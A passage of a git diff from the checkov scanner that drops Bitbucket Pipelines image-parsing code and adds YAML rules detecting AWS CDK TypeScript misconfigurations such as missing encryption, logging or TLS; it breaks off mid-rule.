-        #image: node:10.15.0
-        #
-        #pipelines:
-        #  default:
-        #    - step:
-        #        name: Build and test
-        #        image: node:10.0.0
-        #        script:
-        #          - npm install
-        #          - npm test
-        #          - npm run build
-        #        artifacts:
-        #          - dist/**
-        #    - step:
-        #        name: Deploy
-        #        image: python:3.7.2
-        #        trigger: manual
-        #        script:
-        #          - python deploy.py
-        #  custom:
-        #    sonar:
-        #      - step:
-        #          image: python:3.8.2
-        #          script:
-        #            - echo "Manual triggers for Sonar are awesome!"
-        #    deployment-to-prod:
-        #      - step:
-        #          script:
-        #            - echo "Manual triggers for deployments are awesome!"
-        #  branches:
-        #    staging:
-        #      - step:
-        #          script:
-        #            - echo "Auto pipelines are cool too."
-        :return: List of container image objects mentioned in the file.
-
-        """
-
-        images: set[Image] = set()
-        parsed_file = self._parse_file(file_path)
-
-        if not parsed_file:
-            return images
-
-        workflow, workflow_line_numbers = parsed_file
-
-        if not isinstance(workflow, dict):
-            # make type checking happy
-            return images
-
-        self.add_default_and_pipelines_images(workflow, images, file_path)
-        self.add_root_image(file_path, images, workflow_line_numbers, workflow)
-
-        return images
-
-    def add_default_and_pipelines_images(self, workflow: dict[str, Any], images: set[Image], file_path: str) -> None:
-        """
-
-        :param workflow: parsed workflow file
-        :param images: set of images to be updated
-        :param file_path: path of analyzed workflow
-        """
-        keywords = [
-            "pipelines.default[].step.{image: image, __startline__: __startline__, __endline__:__endline__}",
-            "pipelines.*.[*][][][].step.{image: image, __startline__: __startline__, __endline__:__endline__}",
-        ]
-        for keyword in keywords:
-            results = cast("list[dict[str, Any]]", jmespath.search(keyword, workflow))
-            for result in results:
-                image_name = result.get("image", None)
-                if image_name:
-                    image_obj = Image(
-                        file_path=file_path,
-                        name=image_name,
-                        start_line=result["__startline__"],
-                        end_line=result["__endline__"],
-                    )
-                    images.add(image_obj)
-
-    def add_root_image(
-        self, file_path: str, images: set[Image], workflow_line_numbers: list[tuple[int, str]], workflow: dict[str, Any]
-    ) -> None:
-        root_image = workflow.get("image", "")
+    @staticmethod
+    def _parse_file(
+        f: str, file_content: str | None = None
+    ) -> tuple[dict[str, Any] | list[dict[str, Any]], list[tuple[int, str]]] | None:
+        if Runner.is_workflow_file(f):
+            return YamlRunner._parse_file(f)
 
-        if root_image:
-            for line_number, line_txt in workflow_line_numbers:
-                if "image" in line_txt and not line_txt.startswith(" "):
-                    image_obj = Image(
-                        file_path=file_path,
-                        name=root_image,
-                        start_line=line_number,
-                        end_line=line_number,
-                    )
-                    images.add(image_obj)
+        return None
diff --git a/checkov/cdk/checks/python/AppSyncFieldLevelLogs.yaml b/checkov/cdk/checks/python/AppSyncFieldLevelLogs.yaml
index 514bab9127b..46d0b6b45ac 100644
--- a/checkov/cdk/checks/python/AppSyncFieldLevelLogs.yaml
+++ b/checkov/cdk/checks/python/AppSyncFieldLevelLogs.yaml
@@ -20,4 +20,4 @@ definition:
         <ANY>
         aws_cdk.aws_appsync.CfnGraphQLApi(<ANY>, log_config=$LOG , <ANY>)
     - metavariable: $ARG
-      regex: (ERRORS|ALL)
\ No newline at end of file
+      regex: (ERROR|ALL)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/ALBDropHttpHeaders.yaml b/checkov/cdk/checks/typescript/ALBDropHttpHeaders.yaml
new file mode 100644
index 00000000000..0f60fc3b4d1
--- /dev/null
+++ b/checkov/cdk/checks/typescript/ALBDropHttpHeaders.yaml
@@ -0,0 +1,21 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_131
+  name: Ensure that ALB drops HTTP headers
+  category: NETWORKING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnLoadBalancer(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnLoadBalancer(<ANY>, { <ANY>, type: 'application', <ANY>, loadBalancerAttributes: [<ANY>, {'key': 'routing.http.drop_invalid_header_fields.enabled', 'value': 'true'} ,<ANY>] }, <ANY>)
+    - not_pattern: |
+        new $AWS.CfnLoadBalancer(<ANY>, { <ANY>, type: 'application', <ANY>, loadBalancerAttributes: [<ANY>, {'value': 'true', 'key': 'routing.http.drop_invalid_header_fields.enabled'} ,<ANY>] }, <ANY>)
+    - not_pattern: |
+        new $AWS.CfnLoadBalancer(<ANY>, { <ANY>, loadBalancerAttributes: [<ANY>, {'key': 'routing.http.drop_invalid_header_fields.enabled', 'value': 'true'} ,<ANY>], <ANY>, type: 'application' }, <ANY>)
+    - not_pattern: |
+        new $AWS.CfnLoadBalancer(<ANY>, { <ANY>, loadBalancerAttributes: [<ANY>, {'value': 'true', 'key': 'routing.http.drop_invalid_header_fields.enabled'} ,<ANY>], <ANY>, type: 'application' }, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/ALBListenerHTTPS.yaml b/checkov/cdk/checks/typescript/ALBListenerHTTPS.yaml
new file mode 100644
index 00000000000..c919f3c9455
--- /dev/null
+++ b/checkov/cdk/checks/typescript/ALBListenerHTTPS.yaml
@@ -0,0 +1,25 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_2
+  name: Ensure EFS is securely encrypted
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnListener(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnListener(<ANY>, { <ANY>, protocol: 'HTTPS', <ANY> }, <ANY>)
+    - not_pattern: |
+        new $AWS.CfnListener(<ANY>, { <ANY>, protocol: 'TLS', <ANY> }, <ANY>)
+    - not_pattern: |
+        new $AWS.CfnListener(<ANY>, { <ANY>, protocol: 'TCP', <ANY> }, <ANY>)
+    - not_pattern: |
+        new $AWS.CfnListener(<ANY>, { <ANY>, protocol: 'UDP', <ANY> }, <ANY>)
+    - not_pattern: |
+        new $AWS.CfnListener(<ANY>, { <ANY>, protocol: 'TCP_UDP', <ANY> }, <ANY>)
+    - not_pattern: |
+        new $AWS.CfnListener(<ANY>, { defaultActions: [<ANY>, {type: 'redirect', redirectConfig:{protocol: 'HTTPS'}} , <ANY>] }, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/APIGatewayAccessLogging.yaml b/checkov/cdk/checks/typescript/APIGatewayAccessLogging.yaml
new file mode 100644
index 00000000000..112be450289
--- /dev/null
+++ b/checkov/cdk/checks/typescript/APIGatewayAccessLogging.yaml
@@ -0,0 +1,21 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_76
+  name: Ensure API Gateway has Access Logging enabled
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  patterns:
+    or:
+      - pattern: new $AWS.CfnStage(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.CfnStage(<ANY>, { <ANY>, accessLogSetting: { <ANY>, destinationArn: $ARG , <ANY> }, <ANY> } , <ANY>)
+      - pattern: $AWS.Api(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.Api(<ANY>, { <ANY>, accessLogSetting: { <ANY>, destinationArn: $ARG , <ANY> }, <ANY> } , <ANY>)
diff --git a/checkov/cdk/checks/typescript/APIGatewayAuthorization.yaml b/checkov/cdk/checks/typescript/APIGatewayAuthorization.yaml
new file mode 100644
index 00000000000..4cd8fc043f1
--- /dev/null
+++ b/checkov/cdk/checks/typescript/APIGatewayAuthorization.yaml
@@ -0,0 +1,28 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_59
+  name: Ensure there is no open access to back-end resources through API
+  category: GENERAL_SECURITY
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  patterns:
+    or:
+      - pattern: |
+          const $METHOD = $RESOURCE.addMethod($HTTP_METHOD, <ANY>, { <ANY>, apiKeyRequired: false });
+        conditions:
+          - not_pattern: |
+              const $METHOD = $RESOURCE.addMethod($HTTP_METHOD, <ANY>, { <ANY>, authorizationType: $AUTH });
+          - metavariable: $AUTH
+            regex: ($IMPORT.AuthorizationType.COGNITO|$IMPORT.AuthorizationType.IAM|$IMPORT.AuthorizationType.CUSTOM)
+      - pattern: |
+          const $METHOD = $RESOURCE.addMethod($HTTP_METHOD, <ANY>, { <ANY>, authorizationType: $IMPORT.AuthorizationType.NONE, <ANY> });
+        conditions:
+          - not_pattern: |
+              const $METHOD = $RESOURCE.addMethod($HTTP_METHOD, <ANY>, { <ANY>, apiKeyRequired: false });
+  conditions:
+    - metavariable: $HTTP_METHOD
+      not_regex: OPTIONS
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/APIGatewayCacheEnable.yaml b/checkov/cdk/checks/typescript/APIGatewayCacheEnable.yaml
new file mode 100644
index 00000000000..04eb212f8d6
--- /dev/null
+++ b/checkov/cdk/checks/typescript/APIGatewayCacheEnable.yaml
@@ -0,0 +1,21 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_120
+  name: Ensure API Gateway caching is enabled
+  category: BACKUP_AND_RECOVERY
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  patterns:
+    or:
+      - pattern: new $AWS.Stage(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.Stage(<ANY>, { <ANY>, cacheClusterEnabled: true, <ANY>} , <ANY>)
+      - pattern: new $AWS.CfnApi(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.CfnApi(<ANY>, { <ANY>, cacheClusterEnabled: true , <ANY>} , <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/APIGatewayV2AccessLogging.yaml b/checkov/cdk/checks/typescript/APIGatewayV2AccessLogging.yaml
new file mode 100644
index 00000000000..5679ad036ff
--- /dev/null
+++ b/checkov/cdk/checks/typescript/APIGatewayV2AccessLogging.yaml
@@ -0,0 +1,17 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_95
+  name: Ensure API Gateway V2 has Access Logging enabled
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.$FUNC(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.$FUNC(<ANY>, { <ANY>, accessLogSettings: {<ANY>, destinationArn: $ARG ,<ANY>} ,<ANY>}, <ANY>)
+    - metavariable: $FUNC
+      regex: (CfnStage|CfnApi)
diff --git a/checkov/cdk/checks/typescript/APIGatewayXray.yaml b/checkov/cdk/checks/typescript/APIGatewayXray.yaml
new file mode 100644
index 00000000000..209216a38e5
--- /dev/null
+++ b/checkov/cdk/checks/typescript/APIGatewayXray.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_73
+  name: Ensure API Gateway has X-Ray Tracing enabled
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnStage(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnStage(<ANY>, {<ANY>, tracingEnabled: true, <ANY> }, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/AmazonMQBrokerPublicAccess.yaml b/checkov/cdk/checks/typescript/AmazonMQBrokerPublicAccess.yaml
new file mode 100644
index 00000000000..b08963b272a
--- /dev/null
+++ b/checkov/cdk/checks/typescript/AmazonMQBrokerPublicAccess.yaml
@@ -0,0 +1,13 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_69
+  name: Ensure Amazon MQ Broker should not have public access
+  category: GENERAL_SECURITY
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: |
+    new $AWS.CfnBroker(<ANY>, { <ANY>, publiclyAccessible: true, <ANY> }, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/AppSyncFieldLevelLogs.yaml b/checkov/cdk/checks/typescript/AppSyncFieldLevelLogs.yaml
new file mode 100644
index 00000000000..0aff8f2674e
--- /dev/null
+++ b/checkov/cdk/checks/typescript/AppSyncFieldLevelLogs.yaml
@@ -0,0 +1,22 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_194
+  name: Ensure AppSync has Field-Level logs enabled
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: |
+    const $logConfig: $IMPORT.LogConfig = { <ANY> };
+  conditions:
+    - not_pattern: | 
+        new $IMPORT.GraphqlApi(<ANY>, <ANY>, { <ANY>,  logConfig: $ARG});
+    - not_pattern: |
+        const $LOG: $IMPORT.LogConfig = { FieldLogLevel: $ARG };
+        <ANY>
+        new $IMPORT.GraphqlApi(<ANY>, <ANY>, { <ANY>,  $LOG});
+    - metavariable: $ARG
+      regex: (ERROR|ALL)
diff --git a/checkov/cdk/checks/typescript/AppSyncLogging.yaml b/checkov/cdk/checks/typescript/AppSyncLogging.yaml
new file mode 100644
index 00000000000..43818592ff3
--- /dev/null
+++ b/checkov/cdk/checks/typescript/AppSyncLogging.yaml
@@ -0,0 +1,20 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_193
+  name: Ensure AppSync has Logging enabled
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: |
+    const $logConfig: appsync.LogConfig = { <ANY> };
+  conditions:
+    - not_pattern: |
+        new $IMPORT.GraphqlApi(<ANY>, <ANY>, { <ANY>,  role: <ANY>});
+    - not_pattern: |
+        const $LOG: $IMPORT.LogConfig = { role: <ANY> };
+        <ANY>
+        new $IMPORT.GraphqlApi(<ANY>, <ANY>, { <ANY>,  $LOG});
diff --git a/checkov/cdk/checks/typescript/AthenaWorkgroupConfiguration.yaml b/checkov/cdk/checks/typescript/AthenaWorkgroupConfiguration.yaml
new file mode 100644
index 00000000000..763c17ed07f
--- /dev/null
+++ b/checkov/cdk/checks/typescript/AthenaWorkgroupConfiguration.yaml
@@ -0,0 +1,20 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_82
+  name: Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption
+  category: GENERAL_SECURITY
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: |
+    new $IMPORT.CfnWorkGroup(<ANY>, <ANY>, $WORKGROUP );
+  conditions:
+    - not_within: |
+        const $WORKGROUP: $IMPORT.CfnWorkGroup.WorkGroupConfigurationProperty = { <ANY>, enforceWorkGroupConfiguration: true, <ANY> };
+        <ANY>
+        const $VAR1 = new $IMPORT.CfnWorkGroup(<ANY>, <ANY>, $WORKGROUP );
+    - not_pattern: |
+        new $IMPORT.CfnWorkGroup(<ANY>, <ANY>, {<ANY>, enforceWorkGroupConfiguration: true });
diff --git a/checkov/cdk/checks/typescript/AuroraEncryption.yaml b/checkov/cdk/checks/typescript/AuroraEncryption.yaml
new file mode 100644
index 00000000000..487e599094a
--- /dev/null
+++ b/checkov/cdk/checks/typescript/AuroraEncryption.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_96
+  name: Ensure all data stored in Aurora is securely encrypted at rest
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnDBCluster(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnDBCluster(<ANY>, { <ANY>, storageEncrypted: true ,<ANY>}, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/BackupVaultEncrypted.yaml b/checkov/cdk/checks/typescript/BackupVaultEncrypted.yaml
new file mode 100644
index 00000000000..7ddfec53f3c
--- /dev/null
+++ b/checkov/cdk/checks/typescript/BackupVaultEncrypted.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_166
+  name: Ensure Backup Vault is encrypted at rest using KMS CMK
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnBackupVault(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnBackupVault(<ANY>, { <ANY>, encryptionKeyArn: $ARG, <ANY>}, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/CloudFrontTLS12.yaml b/checkov/cdk/checks/typescript/CloudFrontTLS12.yaml
new file mode 100644
index 00000000000..9920a4f0a9a
--- /dev/null
+++ b/checkov/cdk/checks/typescript/CloudFrontTLS12.yaml
@@ -0,0 +1,23 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_174
+  name: Verify CloudFront Distribution Viewer Certificate is using TLS v1.2
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: |
+    new $CF.CfnDistribution(<ANY>, <ANY>, $VCP)
+  conditions:
+    - not_pattern: |
+        const $VCP: $CF.CfnDistribution.ViewerCertificateProperty = {  minimumProtocolVersion: 'TLSv1.2'};
+        <ANY>
+    - not_pattern: |
+        const $PROPS: $CF.CfnDistributionProps = { <ANY>, viewerCertificate: { <ANY>, minimumProtocolVersion: 'TLSv1.2' } }
+        <ANY>
+        new CfnDistribution(<ANY>, $PROPS)
+    - not_pattern: |
+        new $CF.CfnDistribution(<ANY>, <ANY>, { <ANY>, viewerCertificate: {<ANY>, minimumProtocolVersion: 'TLSv1.2'} })
diff --git a/checkov/cdk/checks/typescript/CloudTrailLogValidation.yaml b/checkov/cdk/checks/typescript/CloudTrailLogValidation.yaml
new file mode 100644
index 00000000000..b1c584f92a9
--- /dev/null
+++ b/checkov/cdk/checks/typescript/CloudTrailLogValidation.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_36
+  name: Ensure CloudTrail log file validation is enabled
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnTrail(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnTrail(<ANY>, { <ANY>, enableLogFileValidation: true , <ANY>}, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/CloudWatchLogGroupKMSKey.yaml b/checkov/cdk/checks/typescript/CloudWatchLogGroupKMSKey.yaml
new file mode 100644
index 00000000000..0e2120dad3e
--- /dev/null
+++ b/checkov/cdk/checks/typescript/CloudWatchLogGroupKMSKey.yaml
@@ -0,0 +1,17 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_158
+  name: Ensure that CloudWatch Log Group is encrypted by KMS
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.LogGroup(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.LogGroup(<ANY>, {<ANY>, encryptionKey: new $ENC.Key(<ANY>) , <ANY>}, <ANY>)
+    - not_pattern: |
+        new $AWS.LogGroup(<ANY>, {<ANY>, encryptionKey: $ARG ,<ANY>} , <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/CloudWatchLogGroupRetention.yaml b/checkov/cdk/checks/typescript/CloudWatchLogGroupRetention.yaml
new file mode 100644
index 00000000000..a134443051d
--- /dev/null
+++ b/checkov/cdk/checks/typescript/CloudWatchLogGroupRetention.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_66
+  name: Ensure that CloudWatch Log Group specifies retention days
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnLogGroup(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnLogGroup(<ANY>, {<ANY>, retentionInDays: $NUM , <ANY>} , <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/CloudfrontDistributionEncryption.yaml b/checkov/cdk/checks/typescript/CloudfrontDistributionEncryption.yaml
new file mode 100644
index 00000000000..72beacecaf8
--- /dev/null
+++ b/checkov/cdk/checks/typescript/CloudfrontDistributionEncryption.yaml
@@ -0,0 +1,17 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_34
+  name: Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  patterns:
+    or:
+      - pattern: |
+          new $AWS.CfnDistribution(<ANY>, {distributionConfig: {<ANY>, defaultCacheBehavior: {<ANY>, viewerProtocolPolicy: 'allow-all' , <ANY>} , <ANY>}, <ANY>)
+      - pattern: |
+          new $AWS.Distribution(<ANY>, {<ANY>, defaultBehavior: {<ANY>, viewerProtocolPolicy: $AWS.ViewerProtocolPolicy.ALLOW_ALL ,<ANY>} , <ANY>},<ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/CloudfrontDistributionLogging.yaml b/checkov/cdk/checks/typescript/CloudfrontDistributionLogging.yaml
new file mode 100644
index 00000000000..fe3592d88f1
--- /dev/null
+++ b/checkov/cdk/checks/typescript/CloudfrontDistributionLogging.yaml
@@ -0,0 +1,21 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_86
+  name: Ensure CloudFront distribution has Access Logging enabled
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  patterns:
+    or:
+      - pattern: new $AWS.Distribution(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.Distribution(<ANY>, {<ANY>, enableLogging: true ,<ANY>} ,<ANY>)
+      - pattern: new $AWS.CfnDistribution(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.CfnDistribution(<ANY>, {<ANY>, distributionConfig: {<ANY>, logging: {<ANY>, bucket: $ARG ,<ANY>} ,<ANY>} ,<ANY>} , <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/CloudtrailEncryption.yaml b/checkov/cdk/checks/typescript/CloudtrailEncryption.yaml
new file mode 100644
index 00000000000..8af99d0ec08
--- /dev/null
+++ b/checkov/cdk/checks/typescript/CloudtrailEncryption.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_35
+  name: Ensure CloudTrail logs are encrypted at rest using KMS CMKs
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnTrail(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnTrail(<ANY>, {<ANY>, kmsKeyId: $ARG, <ANY>} ,<ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/CloudtrailMultiRegion.yaml b/checkov/cdk/checks/typescript/CloudtrailMultiRegion.yaml
new file mode 100644
index 00000000000..e894f867401
--- /dev/null
+++ b/checkov/cdk/checks/typescript/CloudtrailMultiRegion.yaml
@@ -0,0 +1,21 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_67
+  name: Ensure CloudTrail is enabled in all Regions
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  patterns:
+    or:
+      - pattern: new $AWS.Trail(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.Trail(<ANY>, {<ANY>, isMultiRegionTrail: true, <ANY>} ,<ANY>)
+      - pattern: new $AWS.CfnTrail(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.CfnTrail(<ANY>, {<ANY>, isMultiRegionTrail: true, <ANY>} ,<ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/CodeBuildProjectEncryption.yaml b/checkov/cdk/checks/typescript/CodeBuildProjectEncryption.yaml
new file mode 100644
index 00000000000..dc016135315
--- /dev/null
+++ b/checkov/cdk/checks/typescript/CodeBuildProjectEncryption.yaml
@@ -0,0 +1,17 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_78
+  name: Ensure that CodeBuild Project encryption is not disabled
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.Project(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.Project(<ANY>, {<ANY>, encryptionKey: new $ENC.Key(<ANY>) ,<ANY>} , <ANY>)
+    - not_pattern: |
+        new $AWS.Project(<ANY>, {<ANY>, encryptionKey: $ARG ,<ANY>} , <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/DAXEncryption.yaml b/checkov/cdk/checks/typescript/DAXEncryption.yaml
new file mode 100644
index 00000000000..a7ad6517855
--- /dev/null
+++ b/checkov/cdk/checks/typescript/DAXEncryption.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_47
+  name: Ensure DAX is encrypted at rest (default is unencrypted)
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnCluster(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnCluster(<ANY>, {<ANY>, sseSpecification: {<ANY>, enabled: true ,<ANY>} ,<ANY>} , <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/DMSReplicationInstancePubliclyAccessible.yaml b/checkov/cdk/checks/typescript/DMSReplicationInstancePubliclyAccessible.yaml
new file mode 100644
index 00000000000..ce486d4ab4d
--- /dev/null
+++ b/checkov/cdk/checks/typescript/DMSReplicationInstancePubliclyAccessible.yaml
@@ -0,0 +1,13 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_89
+  name: DMS replication instance should not be publicly accessible
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: |
+      new $AWS.CfnReplicationInstance(<ANY>, {<ANY>, publiclyAccessible: true, <ANY>}, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/DocDBAuditLogs.yaml b/checkov/cdk/checks/typescript/DocDBAuditLogs.yaml
new file mode 100644
index 00000000000..050f6916c32
--- /dev/null
+++ b/checkov/cdk/checks/typescript/DocDBAuditLogs.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_104
+  name: Ensure DocumentDB has audit logs enabled
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnDBClusterParameterGroup(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnDBClusterParameterGroup(<ANY>, {<ANY>, parameters: {<ANY>, audit_logs: 'enabled' ,<ANY>}, <ANY>} , <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/DocDBEncryption.yaml b/checkov/cdk/checks/typescript/DocDBEncryption.yaml
new file mode 100644
index 00000000000..dc76185a1c0
--- /dev/null
+++ b/checkov/cdk/checks/typescript/DocDBEncryption.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_74
+  name: Ensure DocumentDB is encrypted at rest (default is unencrypted)
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnDBCluster(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnDBCluster(<ANY>, {<ANY>, storageEncrypted: true, <ANY>} , <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/DocDBTLS.yaml b/checkov/cdk/checks/typescript/DocDBTLS.yaml
new file mode 100644
index 00000000000..68a74e0c6f0
--- /dev/null
+++ b/checkov/cdk/checks/typescript/DocDBTLS.yaml
@@ -0,0 +1,13 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_90
+  name: Ensure DocumentDB TLS is not disabled
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: |
+      new $AWS.CfnDBClusterParameterGroup(<ANY>, {<ANY>, parameters: {<ANY>, tls: 'disabled' ,<ANY>}, <ANY>} ,<ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/DynamodbGlobalTableRecovery.yaml b/checkov/cdk/checks/typescript/DynamodbGlobalTableRecovery.yaml
new file mode 100644
index 00000000000..5c21a342632
--- /dev/null
+++ b/checkov/cdk/checks/typescript/DynamodbGlobalTableRecovery.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_165
+  name: Ensure DynamoDB global table point in time recovery (backup) is enabled
+  category: BACKUP_AND_RECOVERY
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnGlobalTable(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnGlobalTable(<ANY>, {<ANY>, pointInTimeRecoverySpecification: {<ANY>, pointInTimeRecoveryEnabled: true ,<ANY>} ,<ANY>} , <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/DynamodbRecovery.yaml b/checkov/cdk/checks/typescript/DynamodbRecovery.yaml
new file mode 100644
index 00000000000..2dcf8615fd8
--- /dev/null
+++ b/checkov/cdk/checks/typescript/DynamodbRecovery.yaml
@@ -0,0 +1,21 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_28
+  name: Ensure DynamoDB point-in-time recovery (backup) is enabled
+  category: BACKUP_AND_RECOVERY
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  patterns:
+    or:
+      - pattern: new $AWS.CfnTable(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.CfnTable(<ANY>, {<ANY>, pointInTimeRecoverySpecification: {<ANY>, pointInTimeRecoveryEnabled: true ,<ANY>} ,<ANY>} , <ANY>)
+      - pattern: new $AWS.Table(<ANY>)
+        conditions:
+          - not_pattern: |
